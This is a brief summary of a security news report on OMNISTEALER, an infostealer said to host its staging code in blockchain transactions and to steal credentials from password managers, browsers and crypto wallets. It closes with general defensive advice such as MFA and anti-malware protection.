OMNISTEALER is described as a new infostealer that uses public blockchains as a permanent malware hosting platform, storing its staging code inside transactions on TRON, Aptos and Binance Smart Chain. According to Malwarebytes, these blockchains are effectively censorship‑resistant and undeletable once mined, allowing the attacker to maintain a resilient command and control infrastructure.
The threat targets more than 10 password managers, Chrome and Firefox, cloud storage accounts such as Google Drive, and over 60 browser‑based crypto wallets, turning the system into a one‑stop data vacuum. Researchers estimate that roughly 300,000 credentials have already been compromised across sectors from adult sites to financial and government entities.
The attack typically begins with a contractor scam, where code retrieved from a GitHub repository reaches out to the blockchain to fetch and decrypt the final payload. The article, dated 14 April 2026, cautions readers that while the blockchain angle is novel, the threat is not limited to crypto investors and emphasises practical steps to reduce exposure, including robust MFA and updated anti‑malware protection.